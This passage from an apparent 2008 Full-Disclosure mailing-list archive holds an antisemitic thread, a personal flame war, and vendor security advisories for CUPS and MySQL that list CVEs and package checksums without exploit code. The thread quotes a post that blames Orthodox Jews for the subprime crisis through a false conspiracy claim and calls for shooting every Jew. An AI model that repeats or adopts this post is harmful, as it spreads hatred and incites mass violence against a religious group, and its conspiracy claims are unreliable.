>  > The atrocities in Canaan reported about places like Jericho and Ai happened
>  > something like 3 millennia ago now; time to
>  > get over them, and remember there may be statements in the Bible which are
>  > not divinely inspired. In fact the Bible says
>  > there are. See for example Jeremiah 8:8 which I have seen translated as
>  > roughly:
>  >    "How can you say 'we are wise, for we have Yahweh's Torah' when it was
>  > written for a lie, by the lying pens of scribes"
>  >
>  > The tales of Ai and Jericho and so on that come down to us do let us know
>  > the Bible narration has survived pretty well
>  > intact, not been cleaned up or prettied up as happens with so many
>  > narrations with unpleasant acts done by the protagonists.
>  >
>  > The later prophets gave a much more worthy picture of how God wants us to
>  > act, as did Christ.
>  >
>  > Yes, there are people who claim their religion advocates killing all other
>  > groups, disposessing them, stealing from them,
>  > etc. etc. but people like that tend to have lives that are (as Hobbes put
>  > it) nasty, brutish, and short.  Remembering ancient
>  > feuds and wrongs particularly after so long a time is a good way to claim
>  > such a fate also. Thus folks should have a care
>  > about feeding old feuds too.
>  >
>  > -----Original Message-----
>  > From: full-disclosure-bounces at lists.grok.org.uk
>  > [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf
>  > Of Andrew A
>  > Sent: Tuesday, April 01, 2008 7:22 PM
>  > To: Full Disclosure
>  > Subject: [Full-disclosure] Greedy Jews fact of the day
>  >
>  > "And it shall be, when the LORD thy God shall bring thee into the land which
>  > He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give
>  > thee--great and goodly cities, which thou didst not build, and houses full
>  > of all good things, which thou didst not fill, and cisterns hewn out, which
>  > thou didst not hew, vineyards and olive-trees, which thou didst not plant,
>  > and thou shalt eat and be satisfied."
>  >
>  > These verses from Deuteronomy chapter 6 are written on a piece of parchment
>  > and placed in a box which is hung outside the house of every Jew that keeps
>  > the covenant.
>  >
>  > And so they have accomplished, in the United States of America. The subprime
>  > crises and resulting bailouts (at our expense by our national reserve bank,
>  > which is headed by an Orthodox Jew serving a board of Orthodox Jews) are
>  > going to create thousands of empty homes and plots of arable land owned by
>  > investment banking institutions that are owned exclusively by Orthodox Jews.
>  >
>  > Why should we leave a single follower of such a filthy, greedy religion
>  > alive? Do any of you have an idea?
>  >
>  > I pray to you, the Lord my God, to help me destroy the Jewish meme. Every
>  > single follower of this arrogant and horrible idea should have their gold
>  > exchanged for flying pieces of lead and steel. Let the Jews take what they
>  > have reaped and sown-- death, destruction and hatred.
>  >
>  > ________________________________
>  >
>  >
>  >  This transmission may contain information that is privileged, confidential,
>  > legally privileged, and/or exempt from disclosure under applicable law. If
>  > you are not the intended recipient, you are hereby notified that any
>  > disclosure, copying, distribution, or use of the information contained
>  > herein (including any reliance thereon) is STRICTLY PROHIBITED. Although
>  > this transmission and any attachments are believed to be free of any virus
>  > or other defect that might affect any computer system into which it is
>  > received and opened, it is the responsibility of the recipient to ensure
>  > that it is virus free and no responsibility is accepted by JPMorgan Chase &
>  > Co., its subsidiaries and affiliates, as applicable, for any loss or damage
>  > arising in any way from its use. If you received this transmission in error,
>  > please immediately contact the sender and destroy the material in its
>  > entirety, whether in electronic or hard copy format. Thank you.
>
>
> > _______________________________________________
>  >  Full-Disclosure - We believe in it.
>  >  Charter:
>  > http://lists.grok.org.uk/full-disclosure-charter.html
>  >  Hosted and sponsored by Secunia - http://secunia.com/
>  >
>
>  _______________________________________________
>  Full-Disclosure - We believe in it.
>  Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>  Hosted and sponsored by Secunia - http://secunia.com/
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From xploitable at gmail.com  Wed Apr  2 21:26:03 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Apr 2008 21:26:03 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <47F370E6.50301@gmail.com>
References: <mailman.702.1206122051.10081.full-disclosure@lists.grok.org.uk>
	<200803211614.11815.atlas@r4780y.com>
	<4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com>
	<b25f08e40803230344g2dc116efn7a57d19ecbc5099f@mail.gmail.com>
	<4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com>
	<20605.1206932416@turing-police.cc.vt.edu>
	<4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
	<47F370E6.50301@gmail.com>
Message-ID: <4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>

On Wed, Apr 2, 2008 at 12:41 PM, Jeff Stebelton
<jeff.stebelton at gmail.com> wrote:
>  you don't need to fill up
>  people's inboxes with rants and rambling calls for action from the White
>  House (that one split my side laughing). "In the Presidents Early Bird
>  briefings today is yet another serious cyberwarfare warning from that
>  accomplished and respected security researcher, n3td3v. Mark this Top
>  Priority and make sure he sees it first thing!".

No, it was sending signals to important people to take action to get
it further pushed up the ladder. In no way do I expect my e-mail to be
directly looked at by the white house. Through signal intelligence,
the folks at GCHQ and NSA would see it and it would infulence others
who lurk on this list to take action. And for your information, thats
whats happened.

For instance, http://blog.securitynow.us/2008/03/19/storm-worm-russian-business-network-rbn/

"I have sent a plea for assistance to some of my contacts within the
US government and hope others do as well to get this issue resolved."

So unless you've got other ideas on how to stop Storm Worm, stop
trolling in my threads with off-topicness.

n3td3v is big in the security community and is working with others to
get things done for the better of everyone.

Regards,

n3td3v



From security at mandriva.com  Wed Apr  2 21:42:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 02 Apr 2008 14:42:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:081 ] - Updated CUPS packages fix
	multiple vulnerabilities
Message-ID: <E1Jh9mS-0005Co-VU@artemis.annvix.ca>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________
 
 Mandriva Linux Security Advisory                         MDVSA-2008:081
 http://www.mandriva.com/security/
 _______________________________________________________________________
 
 Package : cups
 Date    : April 2, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
 _______________________________________________________________________
 
 Problem Description:
 
 A heap-based buffer overflow in CUPS 1.2.x and later was discovered by
 regenrecht of VeriSign iDenfense that could allow a remote attacker
 to execute arbitrary code via a crafted CGI search expression
 (CVE-2008-0047).
 
 A validation error in the Hp-GL/2 filter was also discovered
 (CVE-2008-0053).
 
 Finally, a vulnerability in how CUPS handled GIF files was found by
 Tomas Hoger of Red Hat, similar to previous issues corrected in PHP,
 gd, tk, netpbm, and SDL_image (CVE-2008-1373).
 
 The updated packages have been patched to correct these issues.
 _______________________________________________________________________

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 4ecbfe664ba6820bf06dc406133e265c  2007.0/i586/cups-1.2.4-1.8mdv2007.0.i586.rpm
 6d51733a95884e36cca9570738537ff6  2007.0/i586/cups-common-1.2.4-1.8mdv2007.0.i586.rpm
 abe0591d8b2b390a82dffcd2fed43b14  2007.0/i586/cups-serial-1.2.4-1.8mdv2007.0.i586.rpm
 91ffe19d342810de71e056e213056552  2007.0/i586/libcups2-1.2.4-1.8mdv2007.0.i586.rpm
 71fd9246da1e48b2dc6a60ceeae41e48  2007.0/i586/libcups2-devel-1.2.4-1.8mdv2007.0.i586.rpm
 bd0f3b69fe5dc7bddd6c121200db014d  2007.0/i586/php-cups-1.2.4-1.8mdv2007.0.i586.rpm 
 cb50a10a1096424175c1a49e8e22a8a1  2007.0/SRPMS/cups-1.2.4-1.8mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 d9423a942f4f779959cfe489866b52f5  2007.0/x86_64/cups-1.2.4-1.8mdv2007.0.x86_64.rpm
 8b13ba591a7dc53c658876dae447ce17  2007.0/x86_64/cups-common-1.2.4-1.8mdv2007.0.x86_64.rpm
 9e434edde16c05fded1b706adaae859d  2007.0/x86_64/cups-serial-1.2.4-1.8mdv2007.0.x86_64.rpm
 9733f3116c8488148471af3d5bdafd16  2007.0/x86_64/lib64cups2-1.2.4-1.8mdv2007.0.x86_64.rpm
 fbb5010088c23aa2cf635875179adc3c  2007.0/x86_64/lib64cups2-devel-1.2.4-1.8mdv2007.0.x86_64.rpm
 00e05d49f33ef5d0067287ef1a27246c  2007.0/x86_64/php-cups-1.2.4-1.8mdv2007.0.x86_64.rpm 
 cb50a10a1096424175c1a49e8e22a8a1  2007.0/SRPMS/cups-1.2.4-1.8mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 dc81f96bd48732eed770b0090b333695  2007.1/i586/cups-1.2.10-2.6mdv2007.1.i586.rpm
 3545d312400a8f5aad55e323d2ff3543  2007.1/i586/cups-common-1.2.10-2.6mdv2007.1.i586.rpm
 f4656b26df51f63813a49006415a783b  2007.1/i586/cups-serial-1.2.10-2.6mdv2007.1.i586.rpm
 ab1869c8ddeda927fdfbc49c386756f1  2007.1/i586/libcups2-1.2.10-2.6mdv2007.1.i586.rpm
 5de192ed26380212896fcd376a1b3e23  2007.1/i586/libcups2-devel-1.2.10-2.6mdv2007.1.i586.rpm
 a347c58fc3e76e064cabf8425d0245ab  2007.1/i586/php-cups-1.2.10-2.6mdv2007.1.i586.rpm 
 15c9274e61f9dbe98150fa1ae58ef7bc  2007.1/SRPMS/cups-1.2.10-2.6mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 1faa57f00d0577f6d25cddf7fccd7edb  2007.1/x86_64/cups-1.2.10-2.6mdv2007.1.x86_64.rpm
 26a14fabfef38f2fd4ab88c6184d4e2f  2007.1/x86_64/cups-common-1.2.10-2.6mdv2007.1.x86_64.rpm
 b5a49bfbeb004af58e1e5f9c1660dece  2007.1/x86_64/cups-serial-1.2.10-2.6mdv2007.1.x86_64.rpm
 6b81f4e888dec6e94231b01fd5d162bf  2007.1/x86_64/lib64cups2-1.2.10-2.6mdv2007.1.x86_64.rpm
 256313a9ac10203a7d59deb6ff0a3da0  2007.1/x86_64/lib64cups2-devel-1.2.10-2.6mdv2007.1.x86_64.rpm
 41e268b0e9e8a5e256c9af6192dfcae0  2007.1/x86_64/php-cups-1.2.10-2.6mdv2007.1.x86_64.rpm 
 15c9274e61f9dbe98150fa1ae58ef7bc  2007.1/SRPMS/cups-1.2.10-2.6mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 27ee99856a1c4448cdee618f2db8ae52  2008.0/i586/cups-1.3.6-1.1mdv2008.0.i586.rpm
 09a6026a683b1ea029b63b0480aa2d4b  2008.0/i586/cups-common-1.3.6-1.1mdv2008.0.i586.rpm
 7974c9c3a572a389fea83250cd57c8e1  2008.0/i586/cups-serial-1.3.6-1.1mdv2008.0.i586.rpm
 a6432e417d401b7900113763255bf8c3  2008.0/i586/libcups2-1.3.6-1.1mdv2008.0.i586.rpm
 cfb0fd68a1d60f1dfa985da0bb79190f  2008.0/i586/libcups2-devel-1.3.6-1.1mdv2008.0.i586.rpm
 aba1862f9db0e18f09d581ef0a95fde8  2008.0/i586/php-cups-1.3.6-1.1mdv2008.0.i586.rpm 
 e034c775d5b04fffb14cb441b8174a55  2008.0/SRPMS/cups-1.3.6-1.1mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 b18f356dc9fc5cda784e576e3f20a801  2008.0/x86_64/cups-1.3.6-1.1mdv2008.0.x86_64.rpm
 bccc98b2ad3205d2c301036ba9d28f61  2008.0/x86_64/cups-common-1.3.6-1.1mdv2008.0.x86_64.rpm
 1c1837c8a8eb04609daa405553ab7fe8  2008.0/x86_64/cups-serial-1.3.6-1.1mdv2008.0.x86_64.rpm
 5748bf84c1239e2b4255446cbf6c8285  2008.0/x86_64/lib64cups2-1.3.6-1.1mdv2008.0.x86_64.rpm
 bd593d10e724d5fcb41a474ceb985996  2008.0/x86_64/lib64cups2-devel-1.3.6-1.1mdv2008.0.x86_64.rpm
 f2db5dfbb8dc8327965a45a5d88e0b6d  2008.0/x86_64/php-cups-1.3.6-1.1mdv2008.0.x86_64.rpm 
 e034c775d5b04fffb14cb441b8174a55  2008.0/SRPMS/cups-1.3.6-1.1mdv2008.0.src.rpm

 Corporate 3.0:
 21bb1e12de3ad442d1abcf6b748e4612  corporate/3.0/i586/cups-1.1.20-5.17.C30mdk.i586.rpm
 0b98a618d204f1cb5d93cfc8bc17ce04  corporate/3.0/i586/cups-common-1.1.20-5.17.C30mdk.i586.rpm
 b4d7d4823f4a052f1b88de95c15fdd35  corporate/3.0/i586/cups-serial-1.1.20-5.17.C30mdk.i586.rpm
 15ff4fca1070bde09536ef5c152f93fa  corporate/3.0/i586/libcups2-1.1.20-5.17.C30mdk.i586.rpm
 29a49e9cd1dab4afc7d4b45f756db2ec  corporate/3.0/i586/libcups2-devel-1.1.20-5.17.C30mdk.i586.rpm 
 2d3ba4ca7a10c5842f6eeb6a7f847e86  corporate/3.0/SRPMS/cups-1.1.20-5.17.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 f977134efb9f309911bfc1b4850e82f0  corporate/3.0/x86_64/cups-1.1.20-5.17.C30mdk.x86_64.rpm
 36fff0b8424e4f651e6f055c70008521  corporate/3.0/x86_64/cups-common-1.1.20-5.17.C30mdk.x86_64.rpm
 696c4e4cc405b9ca56f22819fa2f818b  corporate/3.0/x86_64/cups-serial-1.1.20-5.17.C30mdk.x86_64.rpm
 942d626665fe5a05f879411e7ca80030  corporate/3.0/x86_64/lib64cups2-1.1.20-5.17.C30mdk.x86_64.rpm
 e191a6945b87e3b33617a3de06561d3e  corporate/3.0/x86_64/lib64cups2-devel-1.1.20-5.17.C30mdk.x86_64.rpm 
 2d3ba4ca7a10c5842f6eeb6a7f847e86  corporate/3.0/SRPMS/cups-1.1.20-5.17.C30mdk.src.rpm

 Corporate 4.0:
 a091b07a3a414304cf24e76ab99d3afe  corporate/4.0/i586/cups-1.2.4-0.8.20060mlcs4.i586.rpm
 4cabdbd655b65028ee5bdfb3452f4506  corporate/4.0/i586/cups-common-1.2.4-0.8.20060mlcs4.i586.rpm
 534437dd5a286f0484df0e2cdfd9e636  corporate/4.0/i586/cups-serial-1.2.4-0.8.20060mlcs4.i586.rpm
 0dd449c47be977964034d699749738f7  corporate/4.0/i586/libcups2-1.2.4-0.8.20060mlcs4.i586.rpm
 6aad89786cfec35bc5e81eb3a1dc8cd4  corporate/4.0/i586/libcups2-devel-1.2.4-0.8.20060mlcs4.i586.rpm
 fc46181aa746a4f637d66681fb975560  corporate/4.0/i586/php-cups-1.2.4-0.8.20060mlcs4.i586.rpm 
 83a55c89caf98419e9f76b58c6bee2e5  corporate/4.0/SRPMS/cups-1.2.4-0.8.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 7c7624e35383c614691e4063215f8d65  corporate/4.0/x86_64/cups-1.2.4-0.8.20060mlcs4.x86_64.rpm
 17f29e8614a988900a09305adfd1c85b  corporate/4.0/x86_64/cups-common-1.2.4-0.8.20060mlcs4.x86_64.rpm
 773484820406d7285608081cb7e262d2  corporate/4.0/x86_64/cups-serial-1.2.4-0.8.20060mlcs4.x86_64.rpm
 a53e7a817a42ccc1ac5a5daa7602c4d8  corporate/4.0/x86_64/lib64cups2-1.2.4-0.8.20060mlcs4.x86_64.rpm
 ad933e76d237bbb83bf568071566ba37  corporate/4.0/x86_64/lib64cups2-devel-1.2.4-0.8.20060mlcs4.x86_64.rpm
 4c6d20646db4de2ab03907c9b6705067  corporate/4.0/x86_64/php-cups-1.2.4-0.8.20060mlcs4.x86_64.rpm 
 83a55c89caf98419e9f76b58c6bee2e5  corporate/4.0/SRPMS/cups-1.2.4-0.8.20060mlcs4.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFH88NLmqjQ0CJFipgRAvgQAJ9PyMfRvtdcft3hCuqCnGg+4dLucQCgrz1i
QDjzjtxa/ZH8ibtkLnEJNvQ=
=7iZK
-----END PGP SIGNATURE-----



From pauls at utdallas.edu  Wed Apr  2 22:08:56 2008
From: pauls at utdallas.edu (Paul Schmehl)
Date: Wed, 02 Apr 2008 16:08:56 -0500
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>
References: <mailman.702.1206122051.10081.full-disclosure@lists.grok.org.uk>
	<200803211614.11815.atlas@r4780y.com>
	<4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com>
	<b25f08e40803230344g2dc116efn7a57d19ecbc5099f@mail.gmail.com>
	<4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com>
	<20605.1206932416@turing-police.cc.vt.edu>
	<4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
	<47F370E6.50301@gmail.com>
	<4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>
Message-ID: <CE0F2EF6704F249BB6FBCB04@utd65257.utdallas.edu>

--On Wednesday, April 02, 2008 21:26:03 +0100 n3td3v <xploitable at gmail.com> 
wrote:
>
> No, it was sending signals to important people to take action to get
> it further pushed up the ladder. In no way do I expect my e-mail to be
> directly looked at by the white house. Through signal intelligence,
> the folks at GCHQ and NSA would see it and it would infulence others
> who lurk on this list to take action. And for your information, thats
> whats happened.
>

At first I thought, "How silly", but then I got to thinking about it.....

I'll bet the NSA *does* monitor your communications.  After all, spying is 
serious business.  Those guys probably need an occasional laugh to break the 
tension.  Monitoring your communications almost guarantees them a laugh every 
day.

-- 
Paul Schmehl (pauls at utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/



From xploitable at gmail.com  Wed Apr  2 22:17:43 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Apr 2008 22:17:43 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <CE0F2EF6704F249BB6FBCB04@utd65257.utdallas.edu>
References: <mailman.702.1206122051.10081.full-disclosure@lists.grok.org.uk>
	<200803211614.11815.atlas@r4780y.com>
	<4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com>
	<b25f08e40803230344g2dc116efn7a57d19ecbc5099f@mail.gmail.com>
	<4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com>
	<20605.1206932416@turing-police.cc.vt.edu>
	<4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>
	<47F370E6.50301@gmail.com>
	<4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>
	<CE0F2EF6704F249BB6FBCB04@utd65257.utdallas.edu>
Message-ID: <4b6ee9310804021417t74f194e2xbb4f1923b20c830f@mail.gmail.com>

On Wed, Apr 2, 2008 at 10:08 PM, Paul Schmehl <pauls at utdallas.edu> wrote:
> --On Wednesday, April 02, 2008 21:26:03 +0100 n3td3v <xploitable at gmail.com>
>  wrote:
>  >
>
> > No, it was sending signals to important people to take action to get
>  > it further pushed up the ladder. In no way do I expect my e-mail to be
>  > directly looked at by the white house. Through signal intelligence,
>  > the folks at GCHQ and NSA would see it and it would infulence others
>  > who lurk on this list to take action. And for your information, thats
>  > whats happened.
>  >
>
>  At first I thought, "How silly", but then I got to thinking about it.....
>
>  I'll bet the NSA *does* monitor your communications.  After all, spying is
>  serious business.  Those guys probably need an occasional laugh to break the
>  tension.  Monitoring your communications almost guarantees them a laugh every
>  day.

Why did you cut the link out from the guy who says "I have sent a plea
for assistance to some of my contacts within the US government and
hope others do as well to get this issue resolved."
http://blog.securitynow.us/2008/03/19/storm-worm-russian-business-network-rbn/

And he isn't a nobody, http://blog.securitynow.us/about/

"I have worked as an employee and consultant to many large
corporations (Fortune 500) and government agencies along with
non-profit groups performing security auditing and and secure
system/solution design and implementations."

So suck you foo,

n3td3v



From security at casearmour.net  Wed Apr  2 22:22:52 2008
From: security at casearmour.net (CaseArmour.net Security Administrator)
Date: Wed, 02 Apr 2008 17:22:52 -0400
Subject: [Full-disclosure] Adobe Flash bundling vulnerabilities
Message-ID: <1207171372.26948.1245737023@webmail.messagingengine.com>

I'm noticing a disturbing trend of vulnerable versions of Flash (among
other runtimes) being distributed with lots of different software, and
the list now includes vendors such as Microsoft and -- Adobe.

Adobe AIR up through the last Windows beta bundled a known-vulnerable
version of Flash.  I seem to have deleted my copy of the Beta 2
installer, so I can't confirm what version, but I believe it was a
9.x-series.  The Windows AIR installer, AdobeAIRInstaller.exe
(1.0.7.4880, md5sum 7F5646586EB25CEB2F5457B0BD144F59), presently
available from the Adobe site, has been updated to include Flash 9.0
r115, or at least that's the version reported by the included Netscape
plugin.

In the future, I'm going to be very careful about installing Adobe
products, on the occasions that I'm forced to.

Microsoft, unfortunately, still bundles Flash 6.0.79.0 with, as far as I
can tell, Windows XP, and every Windows XP service pack ever produced,
up through the SP3 RC2 builds.  Installing or slipstreaming a service
pack on Windows XP installs the vulnerable Flash version, and installing
a new Flash build from Adobe *does not* uninstall the vulnerable
version.  I didn't realize this until I was testing Secunia PSI on a
newly-installed system.

I'm not experienced enough with IE or Explorer internals to tell whether
it's possible to convince a browser (or OutLook? or something else?)
instance to render a malicious applet with the older version, but I
wouldn't be surprised if it's possible.  Even if it's not, I'm paranoid
about the possibility of a remote, non-privileged login or other access
being able to leverage the vulnerable Flash OCX.  The install happens
whether or not the XP system in question already includes a newer Flash
build.



From jamie at canonical.com  Wed Apr  2 22:29:38 2008
From: jamie at canonical.com (Jamie Strandboge)
Date: Wed, 2 Apr 2008 17:29:38 -0400
Subject: [Full-disclosure] [USN-588-2] MySQL regression
Message-ID: <20080402212938.GA6848@severus.strandboge.com>

=========================================================== 
Ubuntu Security Notice USN-588-2             April 02, 2008
mysql-dfsg-5.0 regression
https://launchpad.net/bugs/209699
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  mysql-server-5.0                5.0.22-0ubuntu6.06.9

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-588-1 fixed vulnerabilities in MySQL. In fixing CVE-2007-2692 for
Ubuntu 6.06, additional improvements were made to make privilege checks
more restictive. As a result, an upstream bug was exposed which could
cause operations on tables or views in a different database to fail. This
update fixes the problem.

We apologize for the inconvenience.

Original advisory details:

 Masaaki Hirose discovered that MySQL could be made to dereference
 a NULL pointer. An authenticated user could cause a denial of service
 (application crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA
 table. This issue only affects Ubuntu 6.06 and 6.10. (CVE-2006-7232)
 
 Alexander Nozdrin discovered that MySQL did not restore database access
 privileges when returning from SQL SECURITY INVOKER stored routines. An
 authenticated user could exploit this to gain privileges. This issue
 does not affect Ubuntu 7.10. (CVE-2007-2692)
 
 Martin Friebe discovered that MySQL did not properly update the DEFINER
 value of an altered view. An authenticated user could use CREATE SQL
 SECURITY DEFINER VIEW and ALTER VIEW statements to gain privileges.
 (CVE-2007-6303)
 
 Luigi Auriemma discovered that yaSSL as included in MySQL did not
 properly validate its input. A remote attacker could send crafted
 requests and cause a denial of service or possibly execute arbitrary
 code. This issue did not affect Ubuntu 6.06 in the default installation.
 (CVE-2008-0226, CVE-2008-0227)


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.9.diff.gz
      Size/MD5:   155085 f8c7ef90adb69cf67cc6366612b63d48
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.9.dsc
      Size/MD5:     1114 d305551acc1c106afc8fcea708bf7748
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22.orig.tar.gz
      Size/MD5: 18446645 2b8f36364373461190126817ec872031

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0ubuntu6.06.9_all.deb
      Size/MD5:    38560 ba617aed9cc0de2b3ab0bb27e4b73208
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0ubuntu6.06.9_all.deb
      Size/MD5:    41108 c5723e8875ec8ec61bc3e35d279b0785
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0ubuntu6.06.9_all.deb
      Size/MD5:    38564 4c87c774aa76333f9b6ce71be03abd9e

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_amd64.deb
      Size/MD5:  6727828 250a0dc849c954205639795ead8c913c
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_amd64.deb
      Size/MD5:  1423476 81fa43f4bcdaa9721311dd9cd7977713
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_amd64.deb
      Size/MD5:  6897250 ee100a247642429c58c20cf501da925d
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_amd64.deb
      Size/MD5: 22493122 6c8dc59d6b0f8885bdc08e72f7aef6b6

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_i386.deb
      Size/MD5:  6141858 992e52adad73209d80bab70f7fb22d46
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_i386.deb
      Size/MD5:  1383980 fcbf70966d6875c053e30e153b610991
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_i386.deb
      Size/MD5:  6279892 cb5107c59d51513dc3b7d89ef64c2de1
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_i386.deb
      Size/MD5: 21351224 84fe07a8a90d1d7bdefcdfa8bf34bc55

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_powerpc.deb
      Size/MD5:  6885504 86e9ad51262265b596bf490ce3c46a2d
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_powerpc.deb
      Size/MD5:  1463828 6a87ebba2667b07ca253b7bc3772d91e
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_powerpc.deb
      Size/MD5:  6943956 f8630ffc208f766da49a1628076830b6
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_powerpc.deb
      Size/MD5: 22706410 6e44a8947af147ac14a15fdd66e80bfd

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_sparc.deb
      Size/MD5:  6433916 dea5c30c9bc61cf362cfbb7cb692a280
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_sparc.deb
      Size/MD5:  1435924 5da529e0936388dc5584deb4155ba390
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_sparc.deb
      Size/MD5:  6538958 4e658a8fca75f30eeafbfff2a2bffa9c
    http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_sparc.deb
      Size/MD5: 21972902 4d273677401e7896b4e65d8fc9996ce5


-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 189 bytes
Desc: Digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/109667b9/attachment.bin 

From py at gentoo.org  Wed Apr  2 22:16:56 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Wed, 02 Apr 2008 23:16:56 +0200
Subject: [Full-disclosure] [ GLSA 200804-02 ] bzip2: Denial of Service
Message-ID: <47F3F7C8.4030506@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200804-02
